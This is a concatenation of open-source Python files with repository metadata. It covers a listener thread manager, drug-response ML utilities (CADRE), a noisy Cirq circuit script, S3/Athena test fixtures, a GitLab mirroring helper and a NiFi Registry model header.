Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill() | 50.252548 | 221 | 0.511054 |
689086857f25a3645162c721f28272a3a37c64a8 | 11,600 | py | Python | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 7 | 2020-08-21T04:04:13.000Z | 2022-03-08T08:00:30.000Z | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 1 | 2020-10-30T04:14:29.000Z | 2020-11-23T18:34:54.000Z | utils.py | yifengtao/CADRE | 3d35de6234350efe025561d95d4d872766495ea9 | [
"MIT"
] | 1 | 2021-12-23T04:03:15.000Z | 2021-12-23T04:03:15.000Z | # utils.py
import os
import random
import numpy as np
import pandas as pd
from sklearn.metrics import auc, roc_curve, precision_recall_curve
import torch
from torch.autograd import Variable
__author__ = "Yifeng Tao"
def fill_mask(y_trn, m_trn):
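"""Impute missing training labels by a per-drug majority vote.
For each drug (column), entries that are masked out (m_trn == 0) are set to 1
when the observed positives outnumber the observed negatives, otherwise left 0,
and the mask is then marked as fully observed.
"""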
y_pos = y_trn.sum(axis=0)
y_neg = ((1 - y_trn) * m_trn).sum(axis=0)
y_add = np.array([[1 if (m_trn[idx,idy] == 0) and (y_pos[idy] > y_neg[idy]) else 0 for idy in range(y_trn.shape[1])] for idx in range(y_trn.shape[0])])
y_trn = y_trn + y_add
m_trn = np.ones(m_trn.shape)
return y_trn, m_trn
def bool_ext(rbool):
""" Solve the problem that raw bool type is always True.
Parameters
----------
rbool: str
should be True of False.
"""
if rbool not in ["True", "False"]:
raise ValueError("Not a valid boolean string")
return rbool == "True"
def bin2idx(omic_bin):
""" Transfer a binarized matrix into a index matrix (for input of embedding layer).
omic_bin: (num_sample, num_feature), each value in {0,1}
omic_idx: 0 is used for padding, and therefore meaningful index starts from 1.
"""
num_max_omic = omic_bin.sum(axis=1).max() # max number of nonzero omic features in a single sample
omic_idx = np.zeros( (len(omic_bin), num_max_omic), dtype=int )
for idx, line in enumerate(omic_bin):
line = [idy+1 for idy, val in enumerate(line) if val == 1]
omic_idx[idx][0:len(line)] = line
return omic_idx
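# Worked example (illustrative): with two samples and three features,
#   bin2idx(np.array([[0, 1, 1],
#                     [1, 0, 0]]))
# returns one-based feature indices, right-padded with 0:
#   [[2, 3],
#    [1, 0]]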
def get_ptw_ids(drug_info, tgt, repository):
id2pw = {id:pw for id,pw in zip(drug_info.index,drug_info['Target pathway'])}
if repository == 'gdsc':
#GDCS
pws = [id2pw.get(int(c),'Unknown') for c in tgt.columns]
else:
#CCLE
pws = [id2pw.get(c,'Unknown') for c in tgt.columns]
pw2id = {pw:id for id,pw in enumerate(list(set(pws)))}
ptw_ids = [pw2id[pw] for pw in pws]
return ptw_ids
def load_dataset(input_dir="data/input", repository="gdsc", drug_id=-1, shuffle_feature=False):
""" Load dataset. Samples will be shuffled and all omics data and sensitivity
data will be in the same order of samples.
omics_data: dict
exp_bin, mut_bin, cnv_bin, met_bin, exp_idx, mut_idx, cnv_idx, met_idx
tmr, tgt, msk
"""
assert repository in ['gdsc', 'ccle']
# load sensitivity data and multi-omics data
tgt = pd.read_csv(os.path.join(input_dir,repository+'.csv'), index_col=0)
drug_info = pd.read_csv(os.path.join(input_dir,'drug_info_'+repository+'.csv'), index_col=0)
ptw_ids = get_ptw_ids(drug_info, tgt, repository)
omics_data = {'mut':None, 'cnv':None, 'exp':None, 'met':None}
for omic in omics_data.keys():
omics_data[omic] = pd.read_csv(
os.path.join(input_dir,omic+'_'+repository+'.csv'), index_col=0)
# find samples that have all four types of omics data
# 846 samples for gdsc, 409 samples for ccle
common_samples = [v.index for v in omics_data.values()]
common_samples = list( set(tgt.index).intersection(*common_samples) )
tgt = tgt.loc[common_samples]
for omic in omics_data.keys():
omics_data[omic] = omics_data[omic].loc[common_samples]
tmr = list(tgt.index) # barcodes/names of tumors
msk = tgt.notnull().astype(int).values # mask of target data: 1->data available, 0->nan
tgt = tgt.fillna(0).astype(int).values # fill nan element of target with 0.
num_sample = len(tmr)
rng = []
with open('data/input/rng.txt', 'r') as f:
for line in f:
v = int(line.strip())
if v < num_sample:
rng.append(v)
tmr = [tmr[i] for i in rng]
msk = msk[rng]
tgt = tgt[rng]
omics_data_keys = list(omics_data.keys())
for omic in omics_data_keys:
omic_val = omics_data.pop(omic)
omic_val = omic_val.values
if shuffle_feature:
# shuffle features of each sample (in place)
for l in omic_val:
np.random.shuffle(l)
omics_data[omic+'_bin'] = omic_val
omics_data[omic+'_bin'] = omics_data[omic+'_bin'][rng]
omics_data[omic+'_idx'] = bin2idx(omics_data[omic+'_bin'])
omics_data['tgt'] = tgt
omics_data['msk'] = msk
omics_data['tmr'] = tmr
if drug_id != -1:
omics_data["tgt"] = np.expand_dims(tgt[:,drug_id], axis=1)
omics_data["msk"] = np.expand_dims(msk[:,drug_id], axis=1)
return omics_data, ptw_ids
def load_dataset_autoencoder(input_dir="data/input", repository="gdsc", omic="exp"):
""" Load dataset. Samples will be shuffled and all omics data and sensitivity
data will be in the same order of samples.
omics_data: dict
exp_bin, mut_bin, cnv_bin, met_bin, exp_idx, mut_idx, cnv_idx, met_idx
tmr, tgt, msk
"""
assert repository in ['gdsc', 'ccle']
# load sensitivity data and multi-omics data
omics_data = {omic:None}
for omic in omics_data.keys():
omic_drug = pd.read_csv(
os.path.join(input_dir,omic+'_'+repository+'.csv'), index_col=0)
omic_tcga = pd.read_csv(
os.path.join(input_dir,omic+'_tcga_'+repository+'.csv'), index_col=0)
omics_data[omic] = pd.concat([omic_drug,omic_tcga])
common_samples = [[i for i in v.index] for v in omics_data.values()][0]
tmr = common_samples # barcodes/names of tumors
# shuffle whole dataset, this leads to different results for server or laptop
rng = list(range(len(tmr)))
random.Random(2019).shuffle(rng)
tmr = [tmr[i] for i in rng]
omics_data_keys = list(omics_data.keys())
for omic in omics_data_keys:
omic_val = omics_data.pop(omic)
omics_data[omic+'_bin'] = omic_val.values
omics_data[omic+'_bin'] = omics_data[omic+'_bin'][rng]
omics_data[omic+'_idx'] = bin2idx(omics_data[omic+'_bin'])
omics_data['tmr'] = tmr
return omics_data
def split_dataset(dataset, ratio=0.8):
""" Split the dataset according to the ratio of training/test sets.
Parameters
----------
dataset: dict
dict of lists, including omic profiles, cancer types, sensitivities, sample names
ratio: float
size(train_set)/size(train_set+test_set)
Returns
-------
train_set, test_set: dict
"""
num_sample = len(dataset["tmr"])
num_train_sample = int(num_sample*ratio)
train_set = {k:dataset[k][0:num_train_sample] for k in dataset.keys()}
test_set = {k:dataset[k][num_train_sample:] for k in dataset.keys()}
return train_set, test_set
def get_accuracy(aryx, aryy, mskx, msky):
acc_list = [aryx[i] == aryy[i] for i in range(len(aryx)) if (mskx[i]==1) and (msky[i]==1)]
return np.mean(acc_list)
def get_laplacian_matrix(tgt, msk):
print("Getting Laplacian matrix...")
num_drg = tgt.shape[1]
W = np.zeros((num_drg,num_drg))
for i in range(num_drg):
for j in range(i+1, num_drg):
acc_trn = get_accuracy(tgt[:,i], tgt[:,j], msk[:,i], msk[:,j])
if acc_trn > 0.8:
W[i, j] = 1.0
W[j, i] = 1.0
D = np.diag(np.sum(W, axis=0))
L = D - W
return L
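# Small example (illustrative): if drugs 0 and 1 agree on more than 80% of the
# cell lines where both are observed, and drug 2 agrees with neither, then
#   W = [[0, 1, 0],   D = diag(1, 1, 0)   L = D - W = [[ 1, -1, 0],
#        [1, 0, 0],                                    [-1,  1, 0],
#        [0, 0, 0]]                                    [ 0,  0, 0]]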
def wrap_dataset_cuda(dataset, use_cuda):
""" Wrap default numpy or list data into PyTorch variables.
"""
batch_dataset = {'tmr':dataset['tmr']}
for k in ['tgt', 'msk']:
if k in dataset.keys():
batch_dataset[k] = Variable(torch.FloatTensor(dataset[k]))
for k in dataset.keys():
if k.endswith('_idx'):
batch_dataset[k] = Variable(torch.LongTensor(dataset[k]))
elif k.endswith('_bin'):
batch_dataset[k] = Variable(torch.FloatTensor(dataset[k]))
if use_cuda:
for k in batch_dataset.keys():
if k == 'tmr':
continue
else:
batch_dataset[k] = batch_dataset[k].cuda()
return batch_dataset
def get_minibatch(dataset, rng, index, batch_size, batch_type="train", use_cuda=True):
""" Get a mini-batch dataset for training or test -- Multi-task/label
learning version here, so we can take drug reponses of a cell lines as
a single sample.
Parameters
----------
dataset: dict
dict of lists, including SGAs, cancer types, DEGs, patient barcodes
rng: list of id_tmr
index: int
starting index of current mini-batch
batch_size: int
batch_type: str
batch strategy is slightly different for training and test
"train": will return to beginning of the queue when `index` out of range
"test": will not return to beginning of the queue when `index` out of range
Returns
-------
batch_dataset: dict
a mini-batch of the input `dataset`.
"""
size_rng = len(rng)
if batch_type == "train":
batch_dataset = {
k : [ dataset[k][rng[i%size_rng]] for i in range(index, index+batch_size) ] \
for k in dataset.keys()}
elif batch_type == "test":
batch_dataset = {
k : [ dataset[k][rng[i]] for i in range(index, min(index+batch_size, size_rng)) ] \
for k in dataset.keys()}
batch_dataset = wrap_dataset_cuda(batch_dataset, use_cuda)
return batch_dataset
def evaluate(labels, msks, preds, epsilon=1e-5):
""" Calculate performance metrics given ground truths and prediction results.
Parameters
----------
labels: matrix of 0/1
ground truth labels
preds: matrix of float in [0,1]
predicted labels
epsilon: float
a small Laplacian smoothing term to avoid zero denominator
Returns
-------
precision: float
recall: float
f1score: float
accuracy: float
"""
if msks is None:
msks = np.ones(labels.shape)
flat_labels = np.reshape(labels,-1)
flat_preds_nr = np.reshape(preds,-1)
flat_preds = np.reshape(np.around(preds),-1)
flat_msks = np.reshape(msks,-1)
flat_labels_msk = np.array([flat_labels[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_msk = np.array([flat_preds[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_nr_msk = np.array([flat_preds_nr[idx] for idx, val in enumerate(flat_msks) if val == 1])
accuracy = np.mean(flat_labels_msk == flat_preds_msk)
true_pos = np.dot(flat_labels_msk, flat_preds_msk)
precision = 1.0*true_pos/(flat_preds_msk.sum()+epsilon)
recall = 1.0*true_pos/(flat_labels_msk.sum()+epsilon)
f1score = 2*precision*recall/(precision+recall+epsilon)
# bug fix: pass the raw prediction scores (not the rounded labels) to the ROC curve
fpr, tpr, _ = roc_curve(flat_labels_msk, flat_preds_nr_msk)
auc_val = auc(fpr, tpr)
return precision, recall, f1score, accuracy, auc_val
def evaluate_all(labels, msks, preds, epsilon=1e-5):
""" Calculate performance metrics given ground truths and prediction results.
Parameters
----------
labels: matrix of 0/1
ground truth labels
preds: matrix of float in [0,1]
predicted labels
epsilon: float
a small Laplacian smoothing term to avoid zero denominator
Returns
-------
precision: float
recall: float
f1score: float
accuracy: float
"""
if msks is None:
msks = np.ones(labels.shape)
flat_labels = np.reshape(labels,-1)
flat_preds_nr = np.reshape(preds,-1)
flat_preds = np.reshape(np.around(preds),-1)
flat_msks = np.reshape(msks,-1)
flat_labels_msk = np.array([flat_labels[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_msk = np.array([flat_preds[idx] for idx, val in enumerate(flat_msks) if val == 1])
flat_preds_nr_msk = np.array([flat_preds_nr[idx] for idx, val in enumerate(flat_msks) if val == 1])
accuracy = np.mean(flat_labels_msk == flat_preds_msk)
true_pos = np.dot(flat_labels_msk, flat_preds_msk)
precision = 1.0*true_pos/(flat_preds_msk.sum()+epsilon)
recall = 1.0*true_pos/(flat_labels_msk.sum()+epsilon)
f1score = 2*precision*recall/(precision+recall+epsilon)
# bug fix: pass the raw prediction scores (not the rounded labels) to the ROC curve
fpr, tpr, _ = roc_curve(flat_labels_msk, flat_preds_nr_msk)
auc_roc_val = auc(fpr, tpr)
precision_list, recall_list, _ = precision_recall_curve(flat_labels_msk, flat_preds_nr_msk)
auc_pr_val = auc(recall_list, precision_list)
return precision, recall, f1score, accuracy, auc_roc_val, auc_pr_val
| 28.501229 | 153 | 0.6825 |
043964834e0e65f29bcc42ca627921a57ef7f305 | 1,749 | py | Python | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/cirq_new/cirq_program/startCirq_noisy39.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=9
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=6
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=7
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=8
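# Note (added): the two SWAP gates and the two CNOT gates above form identical pairs,
# so each pair cancels to the identity on an ideal device; the net circuit is just a
# Hadamard on every qubit. The duplicates only matter once depolarizing noise is applied below.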
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
circuit = circuit.with_noise(cirq.depolarize(p=0.01))
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_noisy39.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | 29.15 | 77 | 0.691824 |
aef51ba03a3c750c47f957f93756187a93e12a7b | 3,260 | py | Python | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 7 | 2020-04-03T19:40:35.000Z | 2022-01-03T17:28:58.000Z | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 1 | 2022-01-05T13:29:18.000Z | 2022-01-05T13:29:18.000Z | tests/conftest.py | akamai/pallas | 63aba588be3ab97b5e6183e4c560a45c82870cdc | [
"Apache-2.0"
] | 1 | 2020-10-23T11:31:54.000Z | 2020-10-23T11:31:54.000Z | # Copyright 2020 Akamai Technologies, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import secrets
from urllib.parse import urlsplit
import boto3
import pytest
from pallas.assembly import EnvironConfig
config = EnvironConfig(prefix="TEST_PALLAS")
@pytest.fixture(name="region", scope="session")
def region_fixture():
# Do not raise or skip tests if region is not defined.
# Region can be defined in ~/.aws/config.
return config.get_str("REGION")
@pytest.fixture(name="database", scope="session")
def database_fixture():
"""
Athena database.
Tests depending on this fixture are skipped
if the TEST_PALLAS_DATABASE environment variable is not defined.
"""
database = config.get_str("DATABASE")
if not database:
pytest.skip(f"{config.key('DATABASE')} not defined.")
return database
@pytest.fixture(name="workgroup", scope="session")
def workgroup_fixture():
"""
Athena workgroup.
"""
return config.get_str("WORKGROUP")
def _s3_recursive_delete(uri):
scheme, netloc, path, query, fragment = urlsplit(uri)
assert scheme == "s3"
assert query == fragment == ""
if path and not path.endswith("/"):
path += "/"
bucket = boto3.resource("s3").Bucket(netloc)
for item in bucket.objects.filter(Prefix=path):
item.delete()
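# Example (illustrative): urlsplit("s3://my-bucket/tmp/test-pallas-1a2b") yields
# scheme "s3", netloc "my-bucket" (the bucket name) and path "/tmp/test-pallas-1a2b",
# which is then used as the key prefix for the recursive delete.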
@pytest.fixture(name="session_output_location", scope="session")
def session_output_location_fixture():
"""
Base URI of a temporary S3 location.
Performs cleanup at the end of the test session.
Tests depending on this fixture are skipped
if the TEST_PALLAS_OUTPUT_LOCATION environment variable is not defined.
"""
base_output_location = config.get_str("OUTPUT_LOCATION")
if not base_output_location:
pytest.skip(f"{config.key('OUTPUT_LOCATION')} not defined.")
if base_output_location and not base_output_location.endswith("/"):
base_output_location += "/"
token = secrets.token_hex(4) # Unique path allows parallel test runs.
session_output_location = base_output_location + f"test-pallas-{token}"
yield session_output_location
_s3_recursive_delete(session_output_location)
@pytest.fixture(name="output_location")
def output_location_fixture(session_output_location):
"""
URI of a temporary S3 location that can be used for testing.
A unique URI is generated for each test.
Cleanup is performed all at once at the end of the test session.
Tests depending on this fixture are skipped
if the TEST_PALLAS_OUTPUT_LOCATION environment variable is not defined.
"""
if session_output_location and not session_output_location.endswith("/"):
session_output_location += "/"
return session_output_location + secrets.token_hex(8)
| 32.277228 | 77 | 0.724847 |
39cb9e79a094748f59916127acc97b45cc62ec6e | 2,066 | py | Python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/network_watcher.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkWatcher(Resource):
"""Network watcher in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:ivar provisioning_state: The provisioning state of the resource. Possible
values include: 'Succeeded', 'Updating', 'Deleting', 'Failed'
:vartype provisioning_state: str or
~azure.mgmt.network.v2017_09_01.models.ProvisioningState
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'etag': {'key': 'etag', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(self, **kwargs):
super(NetworkWatcher, self).__init__(**kwargs)
self.etag = kwargs.get('etag', None)
self.provisioning_state = None
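# Example (illustrative, not part of the generated code):
#   watcher = NetworkWatcher(location='westus', tags={'env': 'dev'})
# name, type and provisioning_state are read-only and are populated by the service.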
| 34.433333 | 85 | 0.584221 |
c3f90e5d6e96d4856f238bf286404cb56c0f391e | 4,635 | py | Python | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 4 | 2018-04-27T23:12:49.000Z | 2020-11-02T02:03:52.000Z | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 1 | 2020-01-14T08:18:44.000Z | 2020-01-14T08:18:44.000Z | vcs_mirrors/host/gitlab.py | jayvdb/vcs-mirrors | db10e912224b7482ba5d8318b0d78f257d0e152d | [
"MIT"
] | 1 | 2020-01-14T05:22:47.000Z | 2020-01-14T05:22:47.000Z | """
Large parts from: https://github.com/samrocketman/gitlab-mirrors/blob/development/lib/manage_gitlab_project.py
"""
import logging
from zope.interface import implementer
from vcs_mirrors.lib.interfaces import IHost
try:
import gitlab
from gitlab.exceptions import GitlabCreateError
GITLAB_AVAILABLE = True
except ImportError:
GITLAB_AVAILABLE = False
pass
__all__ = ['__virtual__', 'Host']
def __virtual__():
if not GITLAB_AVAILABLE:
logging.warn(
'Host type "gitlab" isn\'t available, couldn\'t import python-gitlab')
return GITLAB_AVAILABLE
def _find_matches(objects, kwargs, find_all):
"""Helper function for _add_find_fn. Find objects whose properties
match all key, value pairs in kwargs.
Source: https://github.com/doctormo/python-gitlab3/blob/master/gitlab3/__init__.py
"""
ret = []
for obj in objects:
match = True
# Match all supplied parameters
for param, val in kwargs.items():
if not getattr(obj, param) == val:
match = False
break
if match:
if find_all:
ret.append(obj)
else:
return obj
if not find_all:
return None
return ret
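# Example (illustrative): _find_matches(projects, {'name': 'mirror'}, False) returns
# the first project whose .name equals 'mirror' (or None if nothing matches), while
# find_all=True returns every matching object as a list.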
@implementer(IHost)
class Host(object):
TYPE = 'gitlab'
_settings = None
def __init__(self, host, settings):
self._settings = {
'url': host,
'ssl_verify': True,
'public': False,
'issues_enabled': False,
'wall_enabled': False,
'merge_requests_enabled': False,
'wiki_enabled': False,
'snippets_enabled': False,
'use_https': False,
}
self._settings.update(settings)
# pylint: disable=E1101
self._api = gitlab.Gitlab(
'https://' + self._settings['url'],
self._settings['api_key'],
ssl_verify=self._settings['ssl_verify'],
api_version=4
)
# pylint: enable=E1101
self._api.auth()
def _find_group(self, **kwargs):
groups = self._api.groups.list()
return _find_matches(groups, kwargs, False)
def _find_user(self, **kwargs):
users = self._api.users.list()
return _find_matches(users, kwargs, False)
def _find_project(self, **kwargs):
projects = self._api.projects.list(as_list=True)
return _find_matches(projects, kwargs, False)
def create_project(self, source, repo):
desc = 'Git mirror of %s.' % source
if self._settings['public']:
desc = 'Public mirror of %s' % source
group, name = repo.split('/')
group_obj = self._find_group(name=group)
if group_obj is None:
group_obj = self._find_user(username=group)
if group_obj is None:
logging.info('%s: Creating group: "%s"' % (self, group))
try:
group_obj = self._api.groups.create({'name': group, 'path': group})
except GitlabCreateError:
logging.error('Cannot create group "%s", error: path has already been taken.' % group)
return False
project_options = {
'name': name,
'description': desc,
'issues_enabled': str(self._settings['issues_enabled']).lower(),
'wall_enabled': str(self._settings['wall_enabled']).lower(),
'merge_requests_enabled': str(self._settings['merge_requests_enabled']).lower(),
'wiki_enabled': str(self._settings['wiki_enabled']).lower(),
'snippets_enabled': str(self._settings['snippets_enabled']).lower(),
'namespace_id': group_obj.id
}
logging.info('%s: Creating project: "%s"' % (self, repo))
try:
project = self._api.projects.create(project_options)
except GitlabCreateError:
logging.error('Cannot create project "%s", error: path has already been taken.' % repo)
return False
if self._settings['use_https']:
return project.http_url_to_repo
return project.ssh_url_to_repo
def get_url(self, repo):
project = self._find_project(name=repo)
if project is None:
return None
if self._settings['use_https']:
return project.http_url_to_repo
return project.ssh_url_to_repo
def __repr__(self):
return '<%s(%s)>' % (self.TYPE, self._settings['url'])
def __str__(self):
return '%s:%s' % (self.TYPE, self._settings['url'])
| 30.097403 | 110 | 0.59137 |
870c0c7558830f685b6f820b0605913e3a9db722 | 3,892 | py | Python | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | null | null | null | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | 8 | 2020-03-24T17:47:23.000Z | 2022-03-12T00:33:21.000Z | cs/python/python_general/misc_functions/dates.py | tobias-fyi/vela | b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82 | [
"MIT"
] | null | null | null | """Fun(c) with dates"""
# %% Imports
from datetime import datetime, timedelta
from typing import List
# %% Mondays
def mondays_between_two_dates(start: datetime, end: datetime) -> List[str]:
"""Returns the dates of each Monday between two dates, inclusive.
:param start (str) : ISO-formatted start date.
:param end (str) : ISO-formatted end date.
:return (List[str]) : List of dates of Mondays falling b/w the two.
"""
mon_dates = []
# Somewhat-convoluted way to find the first Monday
# * by 0 (Monday) means no change
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
# # Interesting idea to get nearest Monday, but doesn't work
# start += timedelta(days=-start.weekday(), weeks=1)
while start <= end: # Add timedelta of 7 until on or after end date
mon_dates.append(start.strftime("%Y-%m-%d"))
start += timedelta(7)
return mon_dates # Return list of dates
print("Start on a monday; end on a Wednesday:")
print(mondays_between_two_dates(datetime(2018, 1, 1), datetime(2018, 1, 31)))
print("\nStart on a Wednesday; end on a Monday:")
print(mondays_between_two_dates(datetime(2018, 1, 3), datetime(2018, 1, 29)))
# %% Mondays
def monday_gen(start: datetime, end: datetime) -> List[str]:
"""Generator version of the above, just for fun."""
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
def mon_gen(start, end):
while start <= end:
yield start.strftime("%Y-%m-%d")
start += timedelta(7)
return [date for date in mon_gen(start, end)]
print("Start on a monday; end on a Wednesday:")
print(monday_gen(datetime(2018, 1, 1), datetime(2018, 1, 31)))
print("\nStart on a Wednesday; end on a Monday:")
print(monday_gen(datetime(2018, 1, 3), datetime(2018, 1, 29)))
# %% Separate / unnested generator func version
# Note: Not typed quite right - it "returns" a generator
def monday_generator(start: datetime, end: datetime, sep: str = "-") -> str:
"""Generator function for Mondays between two dates, inclusive."""
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7)
print("Start on a monday; end on a Wednesday:")
print([m for m in monday_generator(datetime(2018, 1, 1), datetime(2018, 1, 31))])
print("\nStart on a Wednesday; end on a Monday:")
print([m for m in monday_generator(datetime(2018, 1, 3), datetime(2018, 1, 29), "/")])
# %% Parsing datetime strings
print(datetime.fromisoformat("2018-01-01"))
# %%
def monday_genr(start, end, sep: str = "-") -> str:
"""Generator function for Mondays between two dates, inclusive.
Accepts ISO-formatted strings or datetime objects.
"""
if type(start) == str:
start = datetime.fromisoformat(start)
if type(end) == str:
end = datetime.fromisoformat(end)
start += timedelta(((7 * start.weekday()) + (7 - start.weekday())) % 7)
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7)
print("Start on a monday; end on a Wednesday (string):")
print([m for m in monday_genr("2018-01-01", "2018-01-31")])
print("\nStart on a Wednesday; end on a Monday (datetime):")
print([m for m in monday_genr(datetime(2018, 1, 3), datetime(2018, 1, 29), "/")])
# %% Weekly date generator
def day_date_generator(start, end, sep: str = "-") -> str:
"""Generator function for weekly dates between two dates.
Accepts date strings or datetime objects.
"""
if type(start) == str:
start = datetime.fromisoformat(start.replace("/", "-"))
if type(end) == str:
end = datetime.fromisoformat(end.replace("/", "-"))
while start <= end:
yield start.strftime(f"%Y{sep}%m{sep}%d")
start += timedelta(7) # Weekly increments
| 35.706422 | 86 | 0.643114 |
b6b7069571f69f0b0de097e3f6fa403a831fc40c | 3,751 | py | Python | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 199 | 2017-08-24T12:19:41.000Z | 2022-03-20T14:50:17.000Z | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 275 | 2017-08-28T21:21:49.000Z | 2022-03-29T17:57:26.000Z | nipyapi/registry/models/resource.py | Jimvin/nipyapi | 826beac376d4321bd2d69491f09086474c7e7bfb | [
"Apache-2.0"
] | 73 | 2017-09-07T10:13:56.000Z | 2022-02-28T10:37:21.000Z | # coding: utf-8
"""
Apache NiFi Registry REST API
The REST API provides an interface to a registry with operations for saving, versioning, reading NiFi flows and components.
OpenAPI spec version: 1.15.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
